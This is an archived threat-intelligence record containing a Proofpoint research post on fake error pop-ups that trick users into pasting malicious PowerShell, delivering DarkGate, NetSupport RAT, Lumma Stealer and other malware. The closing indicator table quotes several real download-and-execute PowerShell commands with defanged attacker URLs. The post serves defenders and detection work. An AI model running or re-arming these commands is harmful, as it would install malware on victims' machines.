{
	"id": "8335f492-b6c2-4ae4-985d-9181dc0584b6",
	"created_at": "2026-04-06T00:22:15.387378Z",
	"updated_at": "2026-04-10T13:12:59.637005Z",
	"deleted_at": null,
	"sha1_hash": "0e8b6a39651dc35e0d28ea9b6ad5864d217dd611",
	"title": "Clipboard to Compromise: PowerShell Script Self-Pwn | Proofpoint US",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2275704,
	"plain_text": "Clipboard to Compromise: PowerShell Script Self-Pwn | Proofpoint US\r\nBy Tommy Madjar, Dusty Miller, Selena Larson and the Proofpoint Threat Research Team\r\nPublished: 2024-06-13 · Archived: 2026-04-05 14:48:40 UTC\r\nKey findings\r\nProofpoint researchers identified an increasingly popular technique leveraging unique social engineering to run PowerShell and install malware.\r\nResearchers observed TA571 and the ClearFake activity cluster use this technique.\r\nAlthough the attack chain requires significant user interaction to be successful, the social engineering is clever enough to present someone with what looks like a real problem and solution simultaneously, which may prompt a user to take action without considering the risk.\r\nOverview\r\nProofpoint has observed an increase in a technique leveraging unique social engineering that directs users to copy and paste malicious PowerShell scripts to infect their computers with malware. Threat actors including initial access broker TA571 and at least one fake update activity set are using this method to deliver malware including DarkGate, Matanbuchus, NetSupport, and various information stealers.\r\nWhether the initial campaign begins via malspam or is delivered via web browser injects, the technique is similar. Users are shown a popup textbox that suggests an error occurred when trying to open the document or webpage, and instructions are provided to copy and paste a malicious script into the PowerShell terminal or the Windows Run dialog box to eventually run the script via PowerShell.\r\nProofpoint has observed this technique as early as 1 March 2024 by TA571, in early April by the ClearFake cluster, and in early June by both clusters.\r\nCampaign Details\r\nClearFake example\r\nOur researchers first observed this technique with the ClearFake campaign in early April and we have observed it used in every ClearFake campaign since then.
ClearFake is a fake browser update activity cluster that compromises legitimate websites with malicious HTML and JavaScript.\r\nIn observed campaigns, when a user visited a compromised website, the injection caused the website to load a malicious script hosted on the blockchain via Binance’s Smart Chain contracts, a technique known as \"EtherHiding\". The initial script then loaded a second script from a domain that used Keitaro TDS for filtering. If this second script loaded and passed various checks, and if the victim continued to browse the website, they were presented with a fake warning overlay on the compromised website. This warning instructed them to install a \"root certificate\" to view the website correctly.\r\nhttps://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn\r\nPage 1 of 12\r\nMalicious fake warning instructing recipients to copy a PowerShell script and run it in the PowerShell Terminal.\r\nThe message included instructions to click a button to copy a PowerShell script and then provided steps on how to manually run this script on the victim's computer. If the instructions were followed, the user executed the PowerShell by pasting it into the PowerShell command line interface window.\r\nIn campaigns in May, we observed the following chain: the first script performed various functions including flushing the DNS cache, clearing the clipboard, displaying a decoy message to the user, and downloading a remote PowerShell script and executing it in memory. The second PowerShell script was essentially used to download yet another PowerShell script. This third PowerShell script obtained system temperatures via WMI and, if no temperature was returned, as is the case in many virtual environments and sandboxes, exited.
However, if it continued, it led to a fourth AES-encrypted PowerShell script that downloaded a file named “data.zip”, extracted the contents to find and execute any .exe files, and then reported back to the ClearFake C2 that the installation was completed.\r\nThe threat actor used ZIP’s ability to contain any executable and bundled various legitimate, signed executables that side-loaded a trojanized DLL. This DLL used DOILoader (also known as IDAT Loader or HijackLoader) to load Lumma Stealer from an encrypted file, also included in the downloaded ZIP file.\r\nLumma Stealer then, in addition to performing the stealer activities, downloaded three distinctive payloads:\r\nam.exe – Amadey Loader\r\nma.exe – A downloader that downloaded and ran the XMRig cryptocurrency miner with a specific configuration\r\ncl.exe – A clipboard hijacker designed to replace cryptocurrency addresses in the clipboard, causing the victim to transfer cryptocurrency to a threat actor-controlled address instead of the intended address when making transfers\r\nAmadey was observed to download other payloads, for example a Go-based malware believed to be JaskaGO. This means that in total, five distinct malware families could be executed just by running the one initial PowerShell script.\r\nExample ClearFake attack chain.\r\nThe curious case of ClickFix\r\nIn mid-April 2024, researchers found compromised sites containing an inject leading to an iframe on pley[.]es. This iframe was shown as an overlay error message claiming that a faulty browser update needed to be fixed. Researchers dubbed this activity cluster ClickFix.\r\nClickFix error message per 11 May 2024.
\r\nThe error message asked the victim to open “Windows PowerShell (Admin)” (which opens a UAC prompt) and then right-click to paste the code. If this was done, PowerShell would run another remote PowerShell script that would download and run an executable, eventually leading to Vidar Stealer. However, just a few days after discovery, the payload domain used in the PowerShell was taken offline. Thus, despite the error still being displayed on compromised websites, it could not lead to an infection.\r\nAfter a few days of this semi-functional state, on 15 May 2024 the custom content of the iframe was replaced with the ClearFake inject. It is still serving this inject in early June 2024. As the pley[.]es domain itself seems to be compromised, it’s unclear whether these two activity sets – ClearFake and ClickFix – started to work with each other, or whether the ClearFake actor re-compromised the iframe, replacing the code with its own content.\r\nExtract from custom iframe content on 11 May 2024.\r\niframe content as on 07 June 2024.\r\nTA571 examples\r\nProofpoint first observed TA571’s use of this technique in a campaign on 01 March 2024. The campaign included over 100,000 messages and targeted thousands of organizations globally.\r\nTA571 email lure.\r\nIn this campaign, emails contained an HTML attachment that displayed a page resembling Microsoft Word. The page also displayed an error message that said the “‘Word Online’ extension is not installed,” and presented two options to continue: “How to fix” and “Auto-fix”.\r\nHTML attachment containing instructions on how to copy and paste PowerShell that leads to the installation of malware.
\r\nClicking the “How to fix” button copied a base64-encoded PowerShell command to the computer’s clipboard, and the message on the page changed to instruct the target to open a PowerShell terminal and right-click the console window. Right-clicking a terminal window pasted the content of the clipboard and executed the PowerShell. Proofpoint observed two different PowerShell commands in these files: one that downloaded and executed an MSI file, and one that downloaded and executed a VBS script.\r\nIf the “Auto-fix” button was clicked, the search-ms protocol displayed a similar WebDAV-hosted “fix.msi” or “fix.vbs” in Windows Explorer.\r\nWhen executed, the MSI ran a bundled DLL, “Inkpad3.dll”, with the LOLBAS command “msiexec -z”. This command ran the DllUnregisterServer function of the DLL, which dropped and executed another DLL, “Inkpad_honeymoon.msp”. This led to the installation of Matanbuchus. If the VBS was executed, it used PowerShell to download and execute DarkGate.\r\nProofpoint observed TA571 use similar attack chains in campaigns throughout the spring, using various visual lures and alternating between instructing the victim to open the PowerShell terminal and instructing them to use the Run dialog box by pressing the Windows key+R. The actor also removed wording that refers to copy/paste, abusing the fact that the victim doesn’t need to know that something has been copied to the clipboard. Some recent examples:\r\nOn 27 May 2024, TA571 used an HTML attachment that appeared to display a document hosted on OneDrive and contained a fake error message.\r\nHTML attachment purporting to be a document hosted on OneDrive containing a “How to fix” button.\r\nIf the “How to fix” button was clicked, it copied a PowerShell script to the clipboard and provided instructions to the user on how to run it.
This attack chain ultimately led to the installation of DarkGate malware.\r\nTA571 continues to modify and update its lures and attack chains while using the PowerShell clipboard technique. On 28 May 2024, Proofpoint identified a TA571 campaign using HTML attachments that used a different error message. Notably, this campaign included instructions for the victim to click the \"Fix\" button to \"install the root certificate\", which is language that ClearFake error messages used. In this campaign, TA571 asked the victim to use the Run dialog box to run the malicious script instead of the PowerShell terminal. The TA571 campaign contained at least two different command lines running different PowerShell scripts, one leading to DarkGate via a downloaded HTA file that ran another PowerShell script and one leading to NetSupport RAT via a downloaded ZIP file.\r\nIn most of the campaigns, TA571 also padded the HTML files with various random content, creating semi-unique hashes for the attachments.\r\nExample of the new TA571 lure containing similar language to ClearFake.\r\nCommon techniques\r\nIn all cases, whether via the fake updates or the HTML attachments, the malicious PowerShell/CMD script is copied to the clipboard via browser-side JavaScript, a mechanism commonly used on legitimate sites too. The malicious content is contained in the HTML/website in various places and encoded in several ways, such as double-Base64, reversed Base64 or even clear text in various elements and functions. The legitimate use of clipboard JavaScript, the many ways to store the malicious code, and the fact that the victim manually runs the malicious code without any direct association with a file make detection for these types of threats difficult.
As antivirus software and EDRs will have issues inspecting clipboard content, detection and blocking need to be in place before the malicious HTML/site is presented to the victim.\r\nAs for the difference between asking the victim to run the malicious code via the PowerShell terminal or via the Run dialog box, each has its own drawbacks. For example, with the PowerShell terminal, the user must perform more steps to open it. However, once there, a single right-click is enough: the code is automatically pasted and executed, without letting the victim review it first. With the Run dialog box, the whole process can be done with four clicks/key combinations: click the button, Win+R to open the dialog, Ctrl+V to paste the code, and Enter to run it. However, with this method the victim might have second thoughts when seeing the code being pasted and might press Cancel instead of running it.\r\nAttribution\r\nTA571 is a spam distributor, and this actor sends high-volume email campaigns to deliver and install a variety of malware for their cybercriminal customers, depending on the subsequent operator’s objectives. Proofpoint assesses with high confidence that TA571 infections can lead to ransomware.\r\nClearFake is not currently attributed to a tracked threat actor.\r\nWhile it’s clear that both actors are borrowing ideas from each other, Proofpoint does not associate them with each other in any other way.\r\nConclusion\r\nThis attack chain requires significant user interaction to be successful. The social engineering in the fake error messages is clever and purports to be an authoritative notification coming from the operating system. It also provides both the problem and a solution so that a viewer may take prompt action without pausing to consider the risk.
The attack chain is unique and aligns with the overall trend Proofpoint has observed of cybercriminal threat actors adopting new, varied, and increasingly creative attack chains – including improving social engineering, nested PowerShell, and the use of WebDAV and SMB – to enable malware delivery.\r\nOrganizations should train users to identify the activity and report suspicious activity to their security teams. This is very specific training but can easily be integrated into an existing user training program.\r\nEmerging Threats signatures\r\nThe Emerging Threats ruleset contains detections for the malware identified in these campaigns.\r\nExample indicators of compromise\r\nThe following is not an exhaustive list of IOCs, but a sample observed in recent campaigns.\r\nIndicator | Description | Date Observed\r\nrechtsanwalt@ra-silberkuhl[.]com | TA571 campaign reply-to email | 28 May 2024\r\n9701fec71e5bbec912f69c8ed63ffb6dba21b9cca7e67da5d60a72139c1795d1 | TA571 HTML Attachment Example Hash | 28 May 2024\r\nhxxps://cdn3535[.]shop/1[.]zip | TA571 clipboard payload (NetSupport RAT) | 28 May 2024\r\nhxxps://lashakhazhalia86dancer[.]com/c[.]txt | TA571 clipboard payload (DarkGate) | 28 May 2024\r\nhxxp://languangjob[.]com/pandstvx | TA571 HTA payload (DarkGate) | 28 May 2024\r\nhxxp://languangjob[.]com/pandstvx | TA571 PowerShell payload (DarkGate) | 28 May 2024\r\ncmd /c start /min powershell invoke-webrequest -uri hxxps://lashakhazhalia86dancer[.]com/c.txt -outfile c:\\users\\public\\default.hta; start-process c:\\users\\public\\default.hta; | TA571 Clipboard to DarkGate | 28 May 2024\r\ncmd /c start /min 
powershell $st='c:\\\\users\\\\public';$om=$st+'\\\\start.zip';$ps=$st+'\\\\client\\\\client32.exe';invoke-webrequest -uri hxxps://cdn3535[.]shop/1.zip -outfile $om;expand-archive $om $st; start-process $ps;Set-Clipboard -Value ' ';exit; | TA571 Clipboard to NetSupport | 28 May 2024\r\n07e0c15adc6fcf6096dd5b0b03c20145171c00afe14100468f18f01876457c80 | TA571 HTML Attachment Example Hash | 27 May 2024\r\nhxxps://kostumn1[.]ilabserver[.]com/1.zip | TA571 PowerShell Payload URL | 27 May 2024\r\n91.222.173[.]113 | DarkGate C2 | 27 May 2024\r\nhxxp://mylittlecabbage[.]net/qhsddxna | TA571 Payload URL | 17 May 2024\r\nhxxp://mylittlecabbage[.]net/xcdttafq | TA571 Payload URL | 17 May 2024\r\nhxxps://jenniferwelsh[.]com/header.png | TA571 Payload URL | 17 May 2024\r\ncmd /c start /min powershell $Id = 'c:\\users\\public\\or.hta';invoke-webrequest -uri hxxps://jenniferwelsh[.]com/header.png -outfile $Id;start-process $Id;Set-Clipboard -Value ' ';exit;== | TA571 Clipboard to DarkGate | 17 May 2024\r\nmylittlecabbage[.]net | DarkGate C2 | 17 May 2024\r\nhxxps://rtattack[.]baqebei1[.]online/df/tt | ClearFake PowerShell Payload | 14 May 2024\r\nhxxps://oazevents[.]com/loader[.]html | ClickFix PowerShell Payload URL | 11 May 2024\r\n11909c0262563f29d28312baffb7ff027f113512c5a76bab7c5870f348ff778f | TA571 HTML Attachment Example Hash | 1 March 2024\r\nSource: https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia",
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn"
	],
	"report_names": [
		"clipboard-compromise-powershell-self-pwn"
	],
	"threat_actors": [
		{
			"id": "08c8f238-1df5-4e75-b4d8-276ebead502d",
			"created_at": "2023-01-06T13:46:39.344081Z",
			"updated_at": "2026-04-10T02:00:03.294222Z",
			"deleted_at": null,
			"main_name": "Copy-Paste",
			"aliases": [],
			"source_name": "MISPGALAXY:Copy-Paste",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d9b39228-0d9d-4c1e-8e39-2de986120060",
			"created_at": "2023-01-06T13:46:39.293127Z",
			"updated_at": "2026-04-10T02:00:03.277123Z",
			"deleted_at": null,
			"main_name": "BelialDemon",
			"aliases": [
				"Matanbuchus"
			],
			"source_name": "MISPGALAXY:BelialDemon",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "7183913d-9a43-4362-96e1-9af522b6ab84",
			"created_at": "2024-06-19T02:00:04.377344Z",
			"updated_at": "2026-04-10T02:00:03.653777Z",
			"deleted_at": null,
			"main_name": "TA571",
			"aliases": [],
			"source_name": "MISPGALAXY:TA571",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434935,
	"ts_updated_at": 1775826779,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0e8b6a39651dc35e0d28ea9b6ad5864d217dd611.pdf",
		"text": "https://archive.orkl.eu/0e8b6a39651dc35e0d28ea9b6ad5864d217dd611.txt",
		"img": "https://archive.orkl.eu/0e8b6a39651dc35e0d28ea9b6ad5864d217dd611.jpg"
	}
}